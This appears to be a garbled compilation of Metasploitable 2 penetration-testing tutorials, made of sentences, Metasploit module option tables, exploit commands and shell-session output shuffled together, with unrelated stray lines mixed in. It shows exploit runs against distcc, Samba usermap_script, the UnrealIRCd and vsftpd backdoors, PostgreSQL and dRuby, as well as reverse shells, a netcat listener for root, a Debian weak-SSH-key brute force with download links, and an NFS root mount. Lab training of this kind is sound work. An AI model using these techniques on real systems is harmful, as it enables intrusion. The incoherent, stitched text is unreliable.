Once you open the Metasploit console, you will get to see the following screen. Pentesting Vulnerabilities in Metasploitable (part 2), VM version = Metasploitable 2, Ubuntu 64-bit. I am new to penetration testing. PASSWORD no The Password for the specified username Essentially this tests whether the root account has a weak SSH key, checking each key in the directory where you have stored the keys. Armitage is very user friendly. SSLCert no Path to a custom SSL certificate (default is randomly generated) Id Name Exploit target: In the video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3. [*] Command shell session 1 opened (192.168.127.159:4444 -> 192.168.127.154:35889) at 2021-02-06 16:51:56 +0300 Copyright (c) 2000, 2021, Oracle and/or its affiliates. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below. Metasploit is a penetration testing framework that helps you find and exploit vulnerabilities in systems. whoami Then we looked for an exploit in Metasploit, and fortunately, we got one: Distributed Ruby Send instance_eval/syscall Code Execution. Use TWiki to run a project development space, a document management system, a knowledge base or any other groupware tool on either an intranet or the Internet. Here is the list of remote server databases: information_schema dvwa metasploit mysql owasp10 tikiwiki tikiwiki195. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host RHOST yes The target address Id Name LHOST yes The listen address We will do this by hacking FTP, telnet and SSH services. Once the VM is available on your desktop, open the device, and run it with VMWare Player. [*] Reading from sockets The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.
The results from our nmap scan show that the ssh service is running (open) on a lot of machines. [*] A is input RPORT 1099 yes The target port Exploit target: Metasploit is a free open-source tool for developing and executing exploit code. 0 Generic (Java Payload) Before running it, you need to download the pre-calculated vulnerable keys from the following links: http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 (RSA keys), http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 (DSA keys), ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/. Browsing to http://192.168.56.101/ shows the web application home page. [*] Started reverse double handler The primary administrative user msfadmin has a password matching the username. [*] Reading from sockets Loading of any arbitrary file including operating system files. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0. DVWA is PHP-based using a MySQL database and is accessible using admin/password as login credentials. However, the exact version of Samba that is running on those ports is unknown. Payload options (cmd/unix/interact): Inspired by DVWA, Mutillidae allows the user to change the "Security Level" from 0 (completely insecure) to 5 (secure). This document outlines many of the security flaws in the Metasploitable 2 image. 0 Linux x86 Step 1: Type the Virtual Machine name (Metasploitable-2) and set the Type: Linux. Use the showmount command to see the export list of the NFS server. Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. Display the contents of the newly created file. [*] Command: echo 7Kx3j4QvoI7LOU5z; In the next tutorial we'll use Metasploit to scan and detect vulnerabilities on this Metasploitable VM.
---- --------------- -------- ----------- RPORT 3632 yes The target port Id Name We're going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attacker's machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! [*] Writing to socket A Id Name The version range is somewhere between 3 and 4. Exploit target: Loading of any arbitrary web page on the Internet or locally, including the site's password files. Phishing. SQL injection to dump all usernames and passwords via the username field or the password field. XSS via any of the displayed fields. [*] Command: echo ZeiYbclsufvu4LGM; An attacker can run arbitrary OS commands by introducing a rev parameter that includes shell metacharacters to the TWikiUsers script. In Metasploitable that can be done in two ways: first, you can quickly run the ifconfig command in the terminal and find the IP address of the machine, or you can run an Nmap scan in Kali. Metasploitable 2 is a straight-up download. payload => cmd/unix/reverse Proxies no Use a proxy chain WritableDir /tmp yes A directory where we can write files (must not be mounted noexec) PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) To make this step easier, both Nessus and Rapid7 NexPose scanners are used to locate potential vulnerabilities for each service. Here we examine Mutillidae which contains the OWASP Top Ten and more vulnerabilities. [*] Matching URIPATH no The URI to use for this exploit (default is random) RPORT 1099 yes The target port [*] Meterpreter session, using get_processes to find netlink pid RHOSTS yes The target address range or CIDR identifier [*] Reading from sockets The backdoor was quickly identified and removed, but not before quite a few people downloaded it.
Id Name The advantage is that these commands are executed with the same privileges as the application. Module options (exploit/linux/postgres/postgres_payload): [*] Command shell session 1 opened (192.168.127.159:57936 -> 192.168.127.154:6200) at 2021-02-06 22:42:36 +0300 LPORT 4444 yes The listen port Proxies no Use a proxy chain whoami A test environment provides a secure place to perform penetration testing and security research. The purpose of this video is to create a virtual networking environment to learn more about ethical hacking using the Metasploit framework available in Kali Linux. RPORT 6667 yes The target port msf exploit(usermap_script) > exploit [*] Writing to socket B This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. URI yes The dRuby URI of the target host (druby://host:port) payload => java/meterpreter/reverse_tcp It aids penetration testers in choosing and configuring exploits. IP addresses are assigned starting from "101". Find what else is out there and learn how it can be exploited. [*] B: "qcHh6jsH8rZghWdi\r\n" [*] Matching whoami msf exploit(distcc_exec) > show options It comes with a large database of exploits for a variety of platforms and can be used to test the security of systems and look for vulnerabilities. If so please share your comments below. Module options (exploit/unix/misc/distcc_exec): In the next section, we will walk through some of these vectors. RHOSTS yes The target address range or CIDR identifier [*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2021-02-06 23:51:01 +0300 First of all, open the Metasploit console in Kali. Step 7: Display all tables in information_schema. [*] Writing to socket A Previous versions of Metasploitable were distributed as a VM snapshot where everything was set up and saved in that state.
LHOST => 192.168.127.159 Module options (exploit/multi/samba/usermap_script): -- ---- PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line A reinstall of Metasploit was next attempted: Following the reinstall the exploit was run against with the same settings: This seemed to be a partial success: a Command Shell session was generated and able to be invoked via the sessions 1 command. This version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" followed by a system command to the server on any listening port. Nice article. [*] Reading from socket B NetlinkPID no Usually udevd pid-1. Alternatively, you can also use VMWare Workstation or VMWare Server. SESSION yes The session to run this module on. S /tmp/run Much less subtle is the old standby "ingreslock" backdoor that is listening on port 1524. First let's start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search can be used at the MSF Console prompt. LHOST yes The listen address df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev So let's try out every port and see what we're getting. Server version: 5.0.51a-3ubuntu5 (Ubuntu). Module options (exploit/unix/misc/distcc_exec): The account root doesn't have a password. [*] Scanned 1 of 1 hosts (100% complete) You will need the rpcbind and nfs-common Ubuntu packages to follow along. Every CVE Record added to the list is assigned and published by a CNA. The Mutillidae web application (NOWASP (Mutillidae)) contains all of the vulnerabilities from the OWASP Top Ten plus a number of other vulnerabilities such as HTML-5 web storage, forms caching, and click-jacking. Step 4: Display Database Version.
msf auxiliary(postgres_login) > show options [*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) The following sections describe the requirements and instructions for setting up a vulnerable target. The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. Name Current Setting Required Description Under the Module Options section of the above exploit there were the following commands to run: Note: The show targets & set TARGET steps are not necessary as 0 is the default. We're going to exploit it and get a shell: Due to a random number generator vulnerability, the OpenSSL software installed on the system is susceptible to a brute-force attack. USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line So, let's set it up: mkdir /metafs # this will be the mount point, mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking. In this article we continue to demonstrate discovering & exploiting some of the intentional vulnerabilities within a Metasploitable penetration testing target. Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. The FTP server has since been fixed but here is how the affected version could be exploited: In the previous section we identified that the FTP service was running on port 21, so let's try to access it via telnet: This vulnerability can also be exploited using the Metasploit framework using the VSFTPD v2.3.4 Backdoor Command Execution module.
[*] Matching VERBOSE true yes Whether to print output for all attempts Inject the XSS on the register.php page. XSS via the username field. Parameter pollution. GET for POST. XSS via the choice parameter. Cross site request forgery to force user choice. ---- --------------- -------- ----------- RHOST yes The target address Distccd is the server of the distributed compiler for distcc. This method is used to exploit VNC software hosted on Linux, Unix or Windows operating systems with an authentication vulnerability. STOP_ON_SUCCESS => true According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. PASSWORD => postgres Meterpreter sessions will autodetect URI => druby://192.168.127.154:8787 msf exploit(unreal_ircd_3281_backdoor) > exploit For instance, to use native Windows payloads, you need to pick the Windows target. Ultimately they all fall flat in certain areas. msf exploit(distcc_exec) > set RHOST 192.168.127.154 msf auxiliary(tomcat_administration) > show options Here's a description and the CVE number: On Debian-based operating systems (OS), OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 uses a random number generator that produces predictable numbers, making it easier for remote attackers to perform brute force guessing attacks on cryptographic keys. To download Metasploitable 2, visit the following link. The same exploit that we used manually before was very simple and quick in Metasploit. This will be the address you'll use for testing purposes. Exploit target: ---- --------------- -------- ----------- Starting Nmap 6.46 (, msf > search vsftpd ---- --------------- -------- ----------- [*] Started reverse handler on 192.168.127.159:4444 To begin, Nessus wants us to input a range of IP addresses so that we can discover some targets to scan.
Once we get a clear vision of the open ports, we can start enumerating them to see and find the running services alongside their versions. They are input on the add to your blog page. Here is a brief outline of the environment being used: First we need to list what services are visible on the target: This shows that NFS (Network File System) uses port 2049, so next let's determine what shares are being exported: The showmount command tells us that the root / of the file system is being shared. After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. What Is Metasploit? This is Bypassing Authentication via SQL Injection.